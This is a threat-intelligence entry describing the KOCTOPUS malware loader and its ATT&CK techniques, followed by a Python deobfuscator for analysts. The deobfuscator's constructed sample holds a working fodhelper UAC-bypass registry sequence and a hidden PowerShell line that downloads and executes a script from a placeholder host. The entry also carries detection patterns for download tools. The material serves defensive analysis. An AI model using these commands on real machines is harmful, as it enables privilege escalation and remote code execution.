
S0669 KOCTOPUS

KOCTOPUS's batch variant is a loader used by LazyScripter since 2018 to launch Octopus and Koadic and, in some cases, QuasarRAT. KOCTOPUS also has a VBA variant with the same functionality as the batch version. [1]

Item Value
ID S0669
Associated Names
Type MALWARE
Version 1.2
Created 06 December 2021
Last Modified 22 March 2023

Techniques Used

Domain ID Name Use
enterprise T1548 Abuse Elevation Control Mechanism -
enterprise T1548.002 Bypass User Account Control KOCTOPUS performs UAC bypass through either fodhelper.exe or eventvwr.exe. [1]
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder KOCTOPUS can set the AutoRun Registry key with a PowerShell command. [1]
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell KOCTOPUS has used PowerShell commands to download additional files. [1]
enterprise T1059.003 Windows Command Shell KOCTOPUS has used cmd.exe and batch files for execution. [1]
enterprise T1059.005 Visual Basic KOCTOPUS has used VBScript, run through wscript, to execute a PowerShell command. [1]
enterprise T1140 Deobfuscate/Decode Files or Information KOCTOPUS deobfuscates itself before executing its commands. [1]
enterprise T1564 Hide Artifacts -
enterprise T1564.003 Hidden Window KOCTOPUS has used the PowerShell option -WindowStyle Hidden to hide the command window. [1]
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools KOCTOPUS attempts to delete or disable all Registry keys and scheduled tasks related to Microsoft Defender (Windows Defender) and Microsoft Security Essentials. [1]
enterprise T1070 Indicator Removal -
enterprise T1070.009 Clear Persistence KOCTOPUS can delete the Registry keys it created for persistence as part of its cleanup procedure. [1]
enterprise T1105 Ingress Tool Transfer KOCTOPUS has executed a PowerShell command to download a file to the system. [1]
enterprise T1036 Masquerading -
enterprise T1036.005 Match Legitimate Name or Location KOCTOPUS has been disguised as legitimate software associated with the travel and airline industries. [1]
enterprise T1112 Modify Registry KOCTOPUS has added and deleted Registry keys. [1]
enterprise T1106 Native API KOCTOPUS can use the LoadResource and CreateProcessW APIs for execution. [1]
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.010 Command Obfuscation KOCTOPUS has obfuscated scripts with the BatchEncryption tool. [1]
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment KOCTOPUS has been distributed via spearphishing emails with malicious attachments. [1]
enterprise T1566.002 Spearphishing Link KOCTOPUS has been distributed as a malicious link within an email. [1]
enterprise T1090 Proxy KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet. [1]
enterprise T1082 System Information Discovery KOCTOPUS has checked the OS version using wmic.exe and the find command. [1]
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link KOCTOPUS has relied on victims clicking a malicious link delivered via email. [1]
enterprise T1204.002 Malicious File KOCTOPUS has relied on victims opening a malicious document for execution. [1]
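The table records that the batch loader is obfuscated (T1027.010) and deobfuscates itself before running (T1140), and lists the actions it then chains together, but says nothing about how an analyst unpicks such a script. The following Python is an added example and is not code from this page or from any KOCTOPUS sample: it emulates cmd.exe's %VAR:~offset,length% substring expansion, a primitive common to batch obfuscators (the page names BatchEncryption but does not describe its encoding, so no claim about that tool is made here), runs it over a constructed script, and maps each recovered command to the technique IDs in the table above. The script, the variable names, the TEST-NET-2 address 198.51.100.7 and the file name k.ps1 are all constructed for illustration.

```python
"""Recover an obfuscated batch loader by emulating cmd.exe variable expansion,
then map the recovered commands to the ATT&CK techniques listed for KOCTOPUS.
Added example; SAMPLE below is constructed, not taken from a KOCTOPUS sample."""
import re
from typing import Dict, List, Optional, Tuple

# %VAR:~offset% or %VAR:~offset,length%  (cmd.exe substring extraction)
SUBSTR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*):~(-?\d+)(?:,(-?\d+))?%")
# plain %VAR%
PLAIN_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")

# Constructed sample: characters are pulled one at a time out of decoy variables, so
# "powershell", "-WindowStyle Hidden" and "fodhelper" never appear literally in the file.
SAMPLE = r'''
@echo off
set a=abcdefghijklmnopqrstuvwxyz
set b= -WSH
set p=%a:~15,1%%a:~14,1%%a:~22,1%%a:~4,1%%a:~17,1%%a:~18,1%%a:~7,1%%a:~4,1%%a:~11,1%%a:~11,1%
set h=%b:~1,1%%b:~2,1%indow%b:~3,1%tyle%b:~0,1%%b:~4,1%idden
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "%p% %h% -c iex(iwr http://198.51.100.7/k.ps1)" /f
%a:~5,1%%a:~14,1%%a:~3,1%%a:~7,1%%a:~4,1%%a:~11,1%%a:~15,1%%a:~4,1%%a:~17,1%.exe
'''


def cmd_substring(value: str, offset: int, length: Optional[int] = None) -> str:
    """Emulate %VAR:~offset,length%: negative offset counts from the end (clamped to 0),
    negative length stops that many characters before the end, out-of-range gives ''."""
    n = len(value)
    start = offset if offset >= 0 else max(n + offset, 0)
    if start >= n:
        return ""
    if length is None:
        end = n
    elif length >= 0:
        end = min(start + length, n)
    else:
        end = n + length
    return value[start:end] if end > start else ""


def parse_set(line: str) -> Optional[Tuple[str, str]]:
    """Return (name, value) for `set name=value` or `set "name=value"`, else None."""
    m = re.match(r"^\s*@?set\s+(.*)$", line, re.I)
    if not m:
        return None
    body = m.group(1)
    if body.startswith('"') and body.rstrip().endswith('"'):
        body = body.strip()[1:-1]          # quoted form: the quotes delimit the assignment
    name, sep, value = body.partition("=")
    if not sep or not name.strip() or name.startswith("/"):
        return None                        # switches such as set /a and set /p are not handled
    return name.strip(), value             # cmd keeps leading spaces in an unquoted value


def expand_line(line: str, env: Dict[str, str]) -> str:
    """One pass of %-expansion, as cmd.exe performs on each batch line before running it.
    Undefined variables expand to nothing, which is batch-file (not interactive) behaviour."""
    def substr(m):
        value = env.get(m.group(1).upper(), "")
        length = int(m.group(3)) if m.group(3) is not None else None
        return cmd_substring(value, int(m.group(2)), length)

    def plain(m):
        return env.get(m.group(1).upper(), "")

    return PLAIN_RE.sub(plain, SUBSTR_RE.sub(substr, line))


def deobfuscate(script: str) -> Tuple[Dict[str, str], List[str]]:
    """Walk the script once, tracking `set` assignments (variable names are
    case-insensitive) and returning the remaining commands fully resolved."""
    env: Dict[str, str] = {}
    commands: List[str] = []
    for raw in script.splitlines():
        line = expand_line(raw, env)       # `set` lines are expanded too, so stages build on each other
        assignment = parse_set(line)
        if assignment:
            name, value = assignment
            env[name.upper()] = value
            continue
        low = line.strip().lower()
        if not low or low.startswith(("rem ", "::")) or low in ("@echo off", "echo off"):
            continue
        commands.append(line.strip())
    return env, commands


# Triage patterns keyed to the rows in the table above (assumed indicators, not a full detector).
INDICATORS = [
    ("T1059.001 PowerShell", re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("T1564.003 Hidden Window", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)),
    ("T1105 Ingress Tool Transfer",
     re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|certutil|bitsadmin)\b", re.I)),
    ("T1548.002 Bypass User Account Control",
     re.compile(r"ms-settings\\shell\\open\\command|mscfile\\shell\\open\\command"
                r"|\b(fodhelper|eventvwr)(\.exe)?\b", re.I)),
    ("T1547.001 Registry Run Keys", re.compile(r"currentversion\\run\b", re.I)),
    ("T1112 Modify Registry", re.compile(r"^\s*reg(\.exe)?\s+(add|delete)\b", re.I)),
]


def analyse(script: str) -> Tuple[Dict[str, str], List[Tuple[str, List[str]]]]:
    """Deobfuscate, then tag every recovered command with the techniques it exhibits."""
    env, commands = deobfuscate(script)
    hits = [(cmd, [label for label, rx in INDICATORS if rx.search(cmd)]) for cmd in commands]
    return env, hits


if __name__ == "__main__":
    variables, results = analyse(SAMPLE)
    print("variables:", variables)
    for cmd, techniques in results:
        print(f"{cmd}\n    -> {', '.join(techniques) or 'no indicator'}")
```

Run as-is, it prints the recovered variables and three commands: the two reg add lines that plant the ms-settings handler used by the fodhelper.exe UAC bypass, and the fodhelper.exe launch itself. Two caveats: expansion is a single pass per line, as cmd.exe does for batch files, so scripts that rely on delayed expansion (!VAR!) or re-expansion through call need an extra pass; and the indicator regexes are a triage aid that points at the rows above, not a substitute for inspecting the downloaded stage.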

Groups That Use This Software

ID Name References
G0140 LazyScripter [1]

References